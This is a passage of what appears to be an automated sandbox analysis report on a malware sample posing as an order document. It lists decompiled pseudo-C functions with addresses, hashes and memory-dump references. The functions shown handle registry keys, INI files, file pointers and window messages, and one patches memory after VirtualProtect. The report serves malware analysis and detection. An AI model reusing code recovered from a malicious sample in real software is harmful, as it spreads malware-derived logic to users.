											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *(_t38 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}

0x004025c4
0x004025c6
0x004025c9
0x004025ce
0x004025d2
0x004025d5
0x004025d8
0x00402951
0x00402954
0x004025de
0x004025de
0x004025e5
0x004025e7
0x004025e7
0x004025ec
0x00402674
0x00402674
0x00000000
0x004025f2
0x004025f3
0x004025fe
0x00402601
0x00000000
0x00402603
0x00402603
0x00402606
0x00402606
0x0040260f
0x00402616
0x00000000
0x00000000
0x0040261b
0x00402644
0x0040261d
0x00402621
0x0040264e
0x00402654
0x0040266c
0x0040265e
0x0040265e
0x00402661
0x00402661
0x00000000
0x00402629
0x00402629
0x0040262c
0x0040262f
0x00402632
0x00402635
0x00000000
0x00402637
0x0040263a
0x00000000
0x0040263c
0x00000000
0x0040263c
0x0040263a
0x00402635
0x00402621
0x00000000
0x0040261b
0x00402677
0x00402677
0x004015b0
0x00402716
0x00402716
0x00000000
0x004015b0
0x00402601
0x004025ec
0x0040295a
0x00402960

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
Instruction ID: 014ce3e67ccbc0a67955049e33e6e2fc18f0270869ac9b4e1a99f60d8e299e74
Opcode Fuzzy Hash: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
Instruction Fuzzy Hash: CC21F970D04295BEDF318B699948AAEBF749F11304F04457FE4D0B62D5C6BE8A82CF19

Uniqueness

Uniqueness Score: -1.00%

Function 035035D4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

EnumWindows.USER32(BABD89A4), ref: 03503687

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 4b1dcc4d0380d5aabb2d839dbb04735a7b051dc86e9611df3869563cd67fc3a6
Instruction ID: da477126da9847d2f24d4f9df391a03d653079ed425d8a3759692cca53372b1b
Opcode Fuzzy Hash: 4b1dcc4d0380d5aabb2d839dbb04735a7b051dc86e9611df3869563cd67fc3a6
Instruction Fuzzy Hash: 39112B355296C89BC32ACF39E4452C8BBA29FC7B24F2849AEC99C4F251D731140FCB41

Uniqueness

Uniqueness Score: -1.00%

Function 035035C7 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumWindows.USER32(BABD89A4), ref: 03503687

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 3b46ac8d3ec8e6fb9c10340b770910164cbbd1b4449240b68f2867566efbf5c9
Instruction ID: 87f6c6870cbd13a3be98535125698d56d11a22d6641cd7e7f25c5f348194d327
Opcode Fuzzy Hash: 3b46ac8d3ec8e6fb9c10340b770910164cbbd1b4449240b68f2867566efbf5c9
Instruction Fuzzy Hash: 0401D4370187C8EBC32DDFB4B5402C877A5AFCF320F1C493A85982B254DA21014ACEA2

Uniqueness

Uniqueness Score: -1.00%

Function 0350360C Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

EnumWindows.USER32(BABD89A4), ref: 03503687

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: d54df161f70b6ebac4606abba03ba7f58840930391bf88577f484f3be91a842c
Instruction ID: e99db317909aa569a4cdddf3fd6b1814fcbecf3148df7b527626552bb2b4249f
Opcode Fuzzy Hash: d54df161f70b6ebac4606abba03ba7f58840930391bf88577f484f3be91a842c
Instruction Fuzzy Hash: FB0162271187D8E7C32EDFB5B6002C96B659FCF720F18593E856C7B194D9210145CE62

Uniqueness

Uniqueness Score: -1.00%

Function 00402682 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00402682(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402A9F(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
					_t9 = SetFilePointer(E00406010(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
						E00405FF7();
					}
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402682
0x00402682
0x00402683
0x0040268b
0x00402690
0x00402691
0x004026a0
0x004026a9
0x004028f7
0x004028f9
0x004028f9
0x004026a9
0x00402954
0x00402960

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0

Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
Instruction ID: daba68e88d81473494fab100d986bdd4d5457abcde4f4dc52411d400b48531e4
Opcode Fuzzy Hash: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
Instruction Fuzzy Hash: BCE09B71B04116ABD700FB95AA4997E7768DF40304F10403FF515F00C1CA7D4C025B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004022F6 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022F6(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402AC1(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402AC1(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402AC1(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402AC1(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}

0x004022f6
0x004022f6
0x004022f8
0x004022fc
0x004022ff
0x00402307
0x0040230b
0x00402314
0x00402314
0x00402319
0x00402322
0x00402322
0x0040232f
0x004015ae
0x004015b0
0x00402716
0x00402716
0x00402954
0x00402960

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
Instruction ID: f472a2c509351f333654906e099da5e6dfd11f42980ce41b172c94471a0d1cd1
Opcode Fuzzy Hash: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
Instruction Fuzzy Hash: 8BE01A31B401246ADB207AB10E8E96E14989BC4744B29053ABE05B62C3DDBC4C414AB9

Uniqueness

Uniqueness Score: -1.00%

Function 0350EC02 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0350F226

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c017d26d4915925db3ae2bb370bae499eb42282bc6effcdf09082c3ae17a5e5
Instruction ID: 4919f79d2ebd48a80c594f8a184f818196502cf51147369a4b6c7f7d324ae623
Opcode Fuzzy Hash: 7c017d26d4915925db3ae2bb370bae499eb42282bc6effcdf09082c3ae17a5e5
Instruction Fuzzy Hash: 29E0683A1042C04AD315D69094173E57B317F81709F388299C8400A493DF3147B2DBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00405F4D Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F4D(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405EA4(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405f57
0x00405f60
0x00405f76
0x00000000
0x00405f76
0x00405f64
0x00000000

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b8b87f9e7f23a22b038ad66cb6348727c8887116b88fbbe418bbf9d15439b9dc
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: B4E0E67201450DBEDF095F60DD0AD7B371DEB08304F04452EFA45D4091E7B5AD209E74

Uniqueness

Uniqueness Score: -1.00%

Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040171F() {
				long _t5;
				CHAR* _t8;
				CHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathA(_t8, E00402AC1(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401733
0x00401739
0x0040173b
0x004026ea
0x004026f1
0x004026f1
0x00402954
0x00402960

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: e2de62c67f626fd7cbb2d648b6900a9fb7c637aefb91bc1b9a881cf0db71d773
Instruction ID: df229b99d0cfb4b3fe493512c75d53ef4dff6bb2c14726edf2e4ac3df3ce4b05
Opcode Fuzzy Hash: e2de62c67f626fd7cbb2d648b6900a9fb7c637aefb91bc1b9a881cf0db71d773
Instruction Fuzzy Hash: 9FE020B1304101AFD700DB64DD59BAE3B98DF40368F30453AE515E60C1D2B4C9428728

Uniqueness

Uniqueness Score: -1.00%

Function 10002709 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}

0x10002712
0x10002717
0x10002727
0x1000272f
0x10002736
0x1000273b
0x10002740
0x10002745
0x1000274a
0x1000274f
0x10002754
0x10002754
0x1000275c

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19

Uniqueness

Uniqueness Score: -1.00%

Function 0040233A Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040233A(char __ebx) {
				char _t7;
				CHAR* _t8;
				CHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 0xa) = _t7;
				_t8 = E00402AC1(1);
				 *(_t21 - 0x3c) = E00402AC1(0x12);
				GetPrivateProfileStringA(_t8,  *(_t21 - 0x3c), _t21 + 0xa, _t19, 0x3ff, E00402AC1(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040233a
0x00402342
0x00402346
0x00402356
0x0040236d
0x00402373
0x0040173b
0x004026ea
0x004026f1
0x004026f1
0x00402954
0x00402960

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040236D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
Instruction ID: 8896498bc3bf22cdd75c41d4cee83ceff5cc5a9cf36b2948d6df5d4522980b60
Opcode Fuzzy Hash: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
Instruction Fuzzy Hash: 82E08634B44308BADF10AFA19D49EAD3668AF41710F14403AFD547B0E2EEB844429B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F1F Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F1F(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405EA4(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405f29
0x00405f30
0x00405f43
0x00000000
0x00405f43
0x00405f34
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FAD,?,?,?,?,00000002,Call), ref: 00405F43

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 49134d8a29c384089d71c2fc87a48e1db8574b6415c3e00dd087e3758e4bfdf5
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0EC3210420ABADF119E919D01FAB371DEB04350F004426BA45E4091D779D520AE54

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402AC1(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a8
0x004015ae
0x004015b0
0x00402716
0x00402716
0x00402954
0x00402960

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c70efac3b327c3c2a8914d2433bfa69d707dc7d7600d38acd60cc2a8dccf06db
Instruction ID: ce3aa80a16c353682a4fc60f6c60757a41c4294f2dd63ac0650dc91194aad8f9
Opcode Fuzzy Hash: c70efac3b327c3c2a8914d2433bfa69d707dc7d7600d38acd60cc2a8dccf06db
Instruction Fuzzy Hash: E1D0127270811197CB10DBA8AB4869D77A4EB80325B318137D515F21D1E6B9C945671D

Uniqueness

Uniqueness Score: -1.00%

Function 004041A6 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041A6(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x423ef8; // 0x10410
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004041a6
0x004041ad
0x004041b8
0x00000000
0x004041b8
0x004041be

APIs

SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004041B8

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
Instruction ID: 55b95b209562bae9886b89f2f6925b48322e85585088ac1ac71ede26d93296ac
Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
Instruction Fuzzy Hash: 77C09B717407017BEA208F509E4DF0777A96750701F2944397760F60D0C6F4D450DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 004032C5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032C5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004032d3
0x004032d9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

